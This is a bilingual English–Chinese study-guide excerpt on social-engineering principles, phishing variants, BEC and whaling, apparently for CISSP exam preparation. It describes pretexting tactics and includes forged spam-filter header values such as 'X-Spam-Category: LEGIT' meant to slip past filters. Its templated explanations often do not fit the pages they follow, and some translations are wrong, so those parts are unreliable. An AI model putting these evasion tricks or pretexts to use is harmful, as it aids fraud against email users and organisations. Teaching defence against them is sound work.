An example is expanding on a previous CEO and HR document email to include a statement claiming that employees will face a penalty if they do not fill out the form promptly. The penalty could be a loss of casual Friday, exclusion from Taco Tuesday, a reduction in pay, or even termination. Consensus Consensus or social proof is the act of taking advantage of a person's natural tendency to mimic what others are doing or are perceived as having done in the past. For example, bartenders often seed their tip jar with money to make it seem as if previous patrons were appreciative of the service.

As a social engineering principle, the attacker attempts to convince the victim that a particular action or response is necessary to be consistent with social norms or previous occurrences.

中文直译 / 整理

社会工程学之所以如此有效,是因为我们是人类。 社会工程攻击的原则旨在聚 焦人类本性的各个方面并加以利用。 虽然并非每个目标都会对每种攻击屈服, 但大多数人对以下一种或多种常见的社会工程原则都存在脆弱性。 权威 权威是一种有效的技术,因为大多数人往往会服从权威。 关键在于让目标相信 攻击者具有合法的内部或外部权威。 一些攻击者通过言语宣称自己的权威,另 一些则通过穿着服装或制服来假扮权威。 一个例子是使用伪造的首席执行官邮箱发送电子邮件,通知员工必须访问特定 的统一资源定位符(URL)/统一资源标识符(URI)以填写一份重要的HR文 件。 当受害者盲目遵循声称来自权威人士的指令时,这种方法便能奏效。 恐吓 恐吓有时可被视为权威原则的衍生手段。 恐吓利用权威、自信,甚至威胁伤害 来促使他人服从命令或指示。 通常,恐吓侧重于利用情境中缺乏明确操作或应 对指令的不确定性。 一个例子是在此前的首席执行官和HR文件邮件基础上,增加一条声明,称如 果员工不及时填写表格,将面临处罚。 处罚可能包括取消休闲星期五、禁止参 加塔可星期二、减薪,甚至解雇。 共识 共识或社会证明是指利用人们模仿他人行为或过去被感知为他人所做行为的自 然倾向。

例如,调酒师常常在小费罐中预先放入一些钱,以营造出先前顾客对 服务感到满意的假象。 作为一种社会工程学原则,攻击者试图让受害者相信, 采取某种特定行动或回应是符合社会规范或以往情况所必需的。

小白解释

场景先行:你是公司的安全负责人,正在读第 196 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 196 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 58 / PDF P197

第 197 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

An example is an attacker claiming that a worker who is currently out of the office promised a large discount on a purchase and that the transaction must occur now with you as the salesperson. Scarcity Scarcity is a technique used to convince someone that an object has a higher value based on the object's scarcity. This could relate to the existence of only a few items produced or limited opportunities, or that the majority of stock is sold and only a few items remain. An example is an attacker claiming that there are only two tickets left to your favorite team's final game, and it would be a shame if someone else enjoyed the game rather than you.

If you don't grab them now, the opportunity will be lost. This principle is often associated with the principle of urgency. Familiarity Familiarity or liking, as a social engineering principle, attempts to exploit a person's native trust in that which is familiar. The attacker often tries to appear to have a common contact or relationship with the target, such as mutual friends or experiences, or uses a facade to take on the identity of another company or person. If the target believes a message is from a known entity, such as a friend or their bank, they're much more likely to trust the content and even act or respond.

An example is an attacker using a vishing attack while falsifying the caller ID as their doctor's office. Trust Trust as a social engineering principle involves an attacker working to develop a relationship with a victim. This may take seconds or months, but eventually, the attacker attempts to use the value of the relationship (the victim's trust in the attacker) to convince the victim to reveal information or perform an action that violates company security. An example is an attacker approaching you as you walk along the street, when they appear to pick up a $100 bill from the ground. The attacker asks you to hold the money while they ask around to find someone who lost it.

When they return, the attacker says that since the two of you were close when the money was found, you two should split it. They ask if you have change to split the found money. Since the attacker had you hold the money while they went

中文直译 / 整理

例如,攻击者声称一位目前不在办公室的员工曾承诺给予大幅折扣,且交易必 须现在由你作为销售人员完成。 稀缺性 稀缺性是一种用于说服他人认为某物品因稀缺而具有更高价值的技术。 这可能 涉及仅生产了少量物品、机会有限,或大部分库存已售出,仅剩少量物品的情 况。 例如,攻击者声称你最喜爱球队的决赛门票仅剩两张,如果别人观看了比赛而 你却没有,那将非常遗憾。 如果你现在不抢购,这个机会就会失去。 这一原则 常与紧迫性原则相关联。 熟悉性 熟悉性或喜好,作为一种社会工程学原则,试图利用人们对熟悉事物的天然信 任。 攻击者常常试图显得与目标有共同联系或关系,例如共同的朋友或经历, 或伪装成另一家公司或个人的身份。 如果目标相信某条信息来自已知实体,如 朋友或他们的银行,他们就更有可能信任内容,甚至采取行动或作出回应。 例如,攻击者通过伪装成医生办公室的来电显示,实施语音钓鱼攻击。 信任 信任作为一种社会工程学原则,涉及攻击者努力与受害者建立关系。 这一 过程可能只需几秒钟,也可能持续数月,但最终攻击者会利用这种关系的价值 (受害者对攻击者的信任)来诱使受害者泄露信息或执行违反公司安全规定的 行为。

一个例子是,当你在街上行走时,一名攻击者靠近你,假装从地上捡起一张 100美元的钞票。 攻击者请你帮忙拿着钱,自己则四处询问谁丢了钱。 当他们回 来时,攻击者说,由于你们两人在发现钱时靠得很近,应该平分这笔钱。 他们 问你是否有零钱来分这笔发现的钱。 由于攻击者让你拿着钱而他们去寻找失主, 这可能让你对这个陌生人产生了信任,以至于你愿意从钱包里取出现金给他们。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 197 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
学习单元 59 / PDF P198

第 198 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

around to find the person who lost it, this might have caused you to have trust in this stranger so that you are willing to take cash out of your wallet and give it to them. But you won't realize until later that the $100 was counterfeit and you've been robbed. Urgency Urgency often dovetails with scarcity, because the need to act quickly increases as scarcity indicates a greater risk of missing out. Urgency is often used as a method to get a quick response from a target before they have time to carefully consider or refuse compliance.

An example is an attacker using an invoice scam through business email compromise (BEC) to convince you to pay an invoice immediately because either an essential business service is about to be cut off or the company will be reported to a collection agency. Eliciting Information Eliciting information is the activity of gathering or collecting information from systems or people. In the context of social engineering, it is used as a research method in order to craft a more effective pretext. A pretext is a false statement crafted to sound believable in order to convince you to act or respond in favor of the attacker.

Any and all of the social engineering techniques covered in this chapter can be used both as a weapon to harm the target victim and as a means to obtain more information (or access). Thus, social engineering is a tool of both reconnaissance and attack. Data gathered via social engineering can be used to support a physical or logical/technical attack. Any means or method by which a social engineer can gather information from the target is eliciting information.

Any fact, truth, or detail that can be collected, gathered, or gleaned from the target can be used to form a more complete and believable pretext or false story, which in turn may increase the chance of success of the next level or stage of an attack. Consider that many cyberattacks are similar to actual warfare attacks. The more the attacker knows about the targeted enemy, the more effectively a plan of attack can be crafted. Defending against eliciting information events generally involves the same precautions as those used against social engineering. Those include classifying information, controlling the movement of sensitive data, watching

中文直译 / 整理

但你直到后来才会意识到,那张100美元是假钞,你已经被抢劫了。 紧迫性 紧迫性 常常与稀缺性相辅相成,因为稀缺性表明错过机会的风险更高, 从而增加了立即行动的必要性。 紧迫性常被用作一种手段,以在目标有时间仔 细考虑或拒绝配合之前,迅速获得其回应。 例如,攻击者通过商业邮件入侵(BEC)发送虚假发票诈骗,诱使你立即支付 发票,理由是关键的商业服务即将被中断,或公司会被上报至催收机构。 获取信息 获取信息 是从系统或人员处收集信息的活动。 在社会工程学的语境中,它被用 作研究方法,以构建更有效的虚假情境。 虚假情境 是一种精心编造的虚假陈述, 旨在听起来可信,从而促使你采取有利于攻击者的行动或做出回应。 本章所涵 盖的所有社会工程技术,既可作为伤害目标受害者的武器,也可用于获取更多 信息(或访问权限)。 因此,社会工程学既是侦察工具,也是攻击手段。 通过 社会工程学收集的数据可用于支持物理或逻辑/技术攻击。 任何社会工程师用来从目标处获取信息的手段或方法都是信息收集。 任何可以 被收集、获取或挖掘出的关于目标的事实、真相或细节,都可以用来构建更完 整、更可信的伪装理由或虚假故事,从而提高攻击下一阶段或层级的成功几率。

请考虑,许多网络攻击与实际战争攻击类似。 攻击者对目标敌人了解得越多, 就越能有效地制定攻击计划。 防范信息诱导事件通常涉及与防范社会工程学相同的预防措施。 这些措施包括 对信息进行分类、控制敏感数据的流动、观察

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 198 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 60 / PDF P199

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

for attempted abuses, training personnel, and reporting any suspicious activity to the security team. Prepending Prepending is the adding of a term, expression, or phrase to the beginning or header of some other communication. Often, prepending is used in order to further refine or establish the pretext of a social engineering attack, such as spam, hoaxes, and phishing. An attacker can precede the subject of an attack message with RE: or FW: (which indicates “in regard to” and “forwarded,” respectively) to make the receiver think the communication is the continuance of a previous conversation rather than the first contact of an attack.

Other often-used prepending terms are EXTERNAL, PRIVATE, and INTERNAL. Prepending attacks can also be used to fool filters, such as spam filters, antimalware, firewalls, and intrusion detection systems (IDSs). This could be accomplished with SAFE, FILTERED, AUTHORIZED, VERIFIED, CONFIRMED, or APPROVED, among others. It might even be possible to interject alternate email header values, such as “X-Spam-Category: LEGIT” or “X-Spam-Condition: SAFE,” which could fool spam and abuse filters. Phishing Phishing is a form of social engineering attack focused on stealing credentials or identity information from any potential target. It is derived from “fishing” for information.

Phishing can be waged in numerous ways using a variety of communication media, including email and the web; in face-to-face interactions or over the phone; and even through more traditional communication mediums, such as the post office or couriered packages. Attackers send phishing emails indiscriminately as spam, without knowing who will get them but in the hope that some users will respond. Phishing emails sometimes inform the user of a bogus problem and say that if the user doesn't take action, the company will lock the user's account. The From email address is often spoofed to look legitimate, but the Reply To email address is an account controlled by the attacker.

Sophisticated attacks include a link to a bogus website that looks legitimate, but that captures credentials and passes them to the attacker. Sometimes, the goal of phishing is to install malware on user systems. The message may include an infected file attachment or a link to a website that

中文直译 / 整理

试图滥用行为、对人员进行培训,并向安全团队报告任何可疑活动。 前缀添加 前缀添加是指在其他通信的开头或标题前添加一个术语、表达式或短语。 通常, 前缀添加用于进一步细化或建立社会工程攻击(如垃圾邮件、骗局和钓鱼攻击) 的 pretext。 攻击者可以在攻击消息的主题前添加 RE: 或 FW:(分别表示“关 于”和“转发”),以使接收者认为该通信是之前对话的延续,而非首次接触 攻击。 其他常用的前缀术语包括 EXTERNAL、PRIVATE 和 INTERNAL。 前缀攻击也可用于欺骗过滤器,例如垃圾邮件过滤器、反恶意软件、防火墙和 入侵检测系统(IDS)。 这可以通过使用 SAFE、FILTERED、 AUTHORIZED、VERIFIED、CONFIRMED 或 APPROVED 等术语来实现。 甚至可能插入替代的电子邮件标题值,例如“X‑Spam‑Category: LEGIT”或 “X‑Spam‑Condition: SAFE”,从而欺骗垃圾邮件和滥用过滤器。 网络钓鱼 网络钓鱼是一种社会工程学攻击,旨在从任何潜在目标处窃取凭证或身份信息。 其名称源自“钓鱼”以获取信息。

网络钓鱼可以通过多种方式利用各种通信媒 介实施,包括电子邮件和网页; 面对面互动或电话; 甚至通过更传统的通信方 式,如邮政或快递包裹。 攻击者会将网络钓鱼邮件作为垃圾邮件广泛发送,尽管并不知道谁会收到这些 邮件,但仍希望部分用户做出回应。 某些网络钓鱼邮件会告知用户一个虚构的 问题,并声称如果用户不采取行动,公司将会锁定其账户。 发件人邮箱地址通 常被伪造以显得合法,但回复地址却是攻击者控制的账户。 复杂的攻击会包含 一个看似合法的链接,指向一个伪造网站,该网站会捕获用户的凭证并将其传 递给攻击者。 有时,钓鱼攻击的目标是在用户系统上安装恶意软件。 该消息可能包含一个受感 染的文件附件,或指向一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

身份:身份是主体在系统中的标识。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

身份管理题要区分识别、认证、授权、审计。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 61 / PDF P200

第 200 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

installs a malicious drive-by download without the user's knowledge. A drive-by download is a type of malware that installs itself without the user's knowledge when the user visits a website. Drive-by downloads take advantage of vulnerabilities in browsers or plug-ins. To defend against phishing attacks, end users should be trained to do the following: Be suspicious of unexpected email messages or email messages from unknown senders. Never open unexpected email attachments. Never share sensitive information via email. Avoid clicking any link received via email, instant messaging, or a social network message.

If a message claims to be from a known source, such as a website commonly visited, the user should visit the supposed site by using a preestablished bookmark or by searching for the site by name. If, after accessing their account on the site, a duplicate message does not appear in the online messaging or alert system, the original message is likely an attack or a fake. Any such false communications should be reported to the targeted organization, and then the message should be deleted. If the attack relates to your organization or employer, it should be reported to the security team there as well.

Organizations should consider the consequences and increased risk that granting workers access to personal email and social networks through company systems pose. Some companies have elected to block access to personal Internet communications while using company equipment or through company-controlled network connections. This reduces the risk to the organization even if an individual succumbs to a phishing attack on their own. A phishing simulation is a tool used to evaluate the ability of employees to resist or fall for a phishing campaign. A security manager or penetration tester crafts a phishing attack so that any clicks by victims are redirected to a

中文直译 / 整理

在用户不知情的情况下安装恶意驱动程序下载的网站。 驱动下载是一种恶意软件,当用户访问网站时会在用户不知情的情况 下自动安装。 驱动下载利用浏览器或插件中的漏洞。 为防范钓鱼攻击,终端用户应接受以下培训: 对意外收到的电子邮件或来自未知发件人的电子邮件保持警惕。 切勿打开意外的电子邮件附件。 切勿通过电子邮件共享敏感信息。 避免点击通过电子邮件、即时消息或社交媒体消息收到的任何链接。 如果一条消息声称来自已知来源,例如经常访问的网站,用户应通过预先设置 的书签或通过名称搜索该网站来访问该网站。 如果在访问网站账户后,在在线 消息或警报系统中未出现重复消息,则原始消息很可能是攻击或伪造信息。 任 何此类虚假通信都应报告给目标组织,然后删除该消息。 如果该攻击涉及您的 组织或雇主,也应向其安全团队报告。 组织应考虑通过公司系统授予员工访问个人电子邮件和社交网络所带来的后果 和增加的风险。 一些公司已决定在使用公司设备或通过公司控制的网络连接时 阻止访问个人互联网通信。 这可以降低组织的风险,即使个人遭遇了自身的钓 鱼攻击。 一个 钓鱼模拟 是一种用于评估员工抵抗或落入钓鱼攻击能力的工具。

安全管 理员或渗透测试人员设计一个钓鱼攻击,使受害者点击后被重定向到一个

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 200 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 62 / PDF P201

第 201 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

notification that the phishing message was a simulation and they may need to attend additional training to avoid falling for a real attack. Smishing Short Message Service (SMS) phishing or smishing (spam over instant messaging [SPIM]) is a social engineering attack that occurs over or through standard text messaging services. There are several smishing threats to watch out for, including these: Text messages asking for a response or reply. In some cases, replies could trigger a cramming event. Cramming is when a false or unauthorized charge is placed onto your mobile service plan.

Text messages could include a hyperlink/URI/URL to a phishing or scam website or trigger the installation of malicious code. Text messages could contain pretexts to get you involved in a conversation. Text messages could include phone numbers. Always research a phone number before calling it, especially from an unknown source. There are phone numbers with the same structure as local or domestic numbers, but that may actually be long distance and not included in your calling service or plan, and calling them could cause a connection charge and a high per-minute toll charge.

Although smishing refers to SMS-based attacks, it can sometimes be used to refer to similar attacks occurring through Multimedia Messaging Service (MMS), Rich Communication Services (RCS), Google Chat, Android Messages (i.e., SMS), Facebook Messenger, WeChat, Apple/iPhone iMessage, WhatsApp, Slack, Discord, Microsoft Teams, and so on. Vishing Vishing (i.e., voiced-based phishing) or SpIT (spam over internet telephony) is phishing done over any telephony or voice communication system. This includes traditional phone lines, voice-over-IP (VoIP) services, and mobile phones. Most of the social engineers waging vishing campaigns use VoIP technology to support their attacks.

VoIP allows the attacker to be located anywhere in the world, make free phone calls to victims, and be able to falsify or spoof their origin caller ID.

中文直译 / 整理

通知,告知该钓鱼邮件为模拟攻击,他们可能需要参加额外的培训以避免在真实攻 击中受骗。 短信钓鱼 短消息服务(SMS)钓鱼或短信钓鱼(通过即时消息的垃圾信息 [SPIM])是 一种通过标准短信服务进行的社会工程攻击。 需要注意的短信钓鱼威胁包括以 下几种: 要求回复的短信。 在某些情况下,回复可能会触发乱收费事件。 乱收 费是指在您的移动服务计划中被添加了虚假或未经授权的费用。 短信可能包含指向钓鱼网站或诈骗网站的超链接/URI/URL,或触发恶意代码 的安装。 短信可能包含借口,诱使您参与对话。 短信可能包含电话号码。 在拨打任何电话号码之前,请务必进行查询, 尤其是来自未知来源的号码。 有些电话号码的格式与本地或国内号码相 同,但实际上可能是长途号码,不包含在您的通话服务或套餐中,拨打 这些号码可能导致连接费和高额每分钟通话费。

尽管短信钓鱼(smishing)指的是基于短信的攻击,但它有时也用于指代通过 多媒体消息服务(MMS)、富通信服务(RCS)、Google 聊天、Android 消 息(即短信)、Facebook Messenger、微信、Apple/iPhone iMessage、 WhatsApp、Slack、Discord、Microsoft Teams 等发生的类似攻击。 语音钓鱼 Vishing(即基于语音的网络钓鱼)或SpIT(通过互联网电话的垃圾语音) 是指通过任何电话或语音通信系统进行的网络钓鱼。 这包括传统电话线路、语 音互联网协议(VoIP)服务和移动电话。 大多数进行Vishing活动的社会工程 人员使用VoIP技术来支持其攻击。 VoIP允许攻击者位于世界任何地方,免费 向受害者拨打电话,并能够伪造或篡改其来电显示号码。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 201 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 63 / PDF P202

第 202 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Vishing calls can display a caller ID or phone number from any source the attacker thinks might cause the victim to answer the call. Some attackers just duplicate your area code and prefix in order to trick the victim into thinking the call is from a neighbor or other local entity. Vishing is simply another form of phishing attack. Vishing involves the pretexting of the displayed caller ID and the story the attacker spouts. Always assume caller ID is false or at least incorrect. Spear Phishing Spear phishing is a more targeted form of phishing where the message is crafted and directed specifically to a group of individuals.

Often, attackers use a stolen customer database to send false messages crafted to seem like a communication from the compromised business but with falsified source addresses and incorrect URI/URLs. The hope of the attacker is that someone who already has an online/digital relationship with an organization is more likely to fall for the false communication. All of the concepts and defenses discussed in the previous section, “Phishing,” apply to spear phishing. Spear phishing can also be crafted to seem as if it originated from a CEO or other top office in an organization. This version of spear phishing is called business email compromise (BEC).

BEC is often focused on convincing members of accounting or financial departments to transfer funds or pay invoices based on instructions seeming to originate from a boss, manager, or executive. BEC has defrauded organizations of billions of dollars in the last few years. BEC is also known as CEO fraud or CEO spoofing.

As with most forms of social engineering, defenses for spear phishing require the following: Labeling information, data, and assets with their value, importance, or sensitivity Training personnel on proper handling of those assets based on their labels Requesting clarification or confirmation on any actions that seem abnormal, off-process, or otherwise overly risky to the organization Some abusive concepts to watch out for are requests to pay bills or invoices using prepaid gift cards, changes to wiring details (especially at the last Vishing

中文直译 / 整理

电话可以显示攻击者认为可能诱使受害者接听电话的任何来源的来电显 示号码或电话号码。 一些攻击者只是复制您的区号和前缀,以欺骗受害者以为 来电来自邻居或其他本地实体。 Vishing只是另一种网络钓鱼攻击形式。 Vishing涉及伪造显示的来电显示号码以及攻击者编造的说辞。 请始终假设来电 显示号码是虚假的,或至少是不正确的。 鱼叉式钓鱼攻击 鱼叉式钓鱼是一种更具针对性的钓鱼形式,其消息经过精心设计并专门发送给 特定群体。 攻击者通常利用被盗的客户数据库,发送看似来自被入侵企业的虚 假信息,但源地址和URI/URL均被伪造。 攻击者的期望是,那些已与某组织建 立在线/数字关系的人更有可能相信这些虚假信息。 上一节“钓鱼”中讨论的所有概念和防御措施均适用于鱼叉式钓鱼。 鱼叉式钓鱼还可以被设计成看似来自企业首席执行官或其他高层管理人员。 这 种版本的鱼叉式钓鱼称为商业电子邮件泄露(BEC)。 BEC通常旨在说服会计 或财务部门的员工根据看似来自老板、经理或高管的指令转账或支付发票。 近 年来,BEC已使众多组织损失数十亿美元。 BEC也被称为首席执行官欺诈或首 席执行官伪装。

与大多数社会工程形式一样,针对鱼叉式网络钓鱼的防御措施需要以下内容: 根据信息、数据和资产的价值、重要性或敏感性对其进行标记 根据标记对人员进行适当处理这些资产的培训 对任何看似异常、偏离流程或对组织构成过高风险的操作,请求澄清或 确认 需要注意的一些滥用行为包括:要求使用预付礼品卡支付账单或发票、更改汇款 详情(尤其是最后一刻)

小白解释

场景先行:你是公司的安全负责人,正在读第 202 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 202 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 64 / PDF P203

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

minute), or requests to purchase products that are atypical for the requester and that are needed in a rush. When seeking to confirm a suspected BEC, do not use the same communication medium that the BEC used. Make a phone call, go to their office, text-message their cell phone, or use the companyapproved internal messaging service. Establishing a second “out-of-band” contact with the requester will further confirm whether the message is legitimate or false. Whaling Whaling is a form of spear phishing that targets specific high-value individuals (by title, by industry, from media coverage, and so forth), such as the CEO or other C-level executives, administrators, or high-net-worth clients.

Whaling attacks require significantly more research, planning, and development on the part of the attackers in order to fool the victim. That is because these high-level personnel are often well aware that they are a highvalue target. Spam Spam is any type of email that is undesired and/or unsolicited. But spam is not just unwanted advertisements; it can also include malicious content and attack vectors as well. Spam is often used as the carrier of social engineering attacks. Spam is a problem for numerous reasons: Some spam carries malicious code such as viruses, logic bombs, ransomware, or Trojan horses. Some spam carries social engineering attacks (also known as hoax messages).

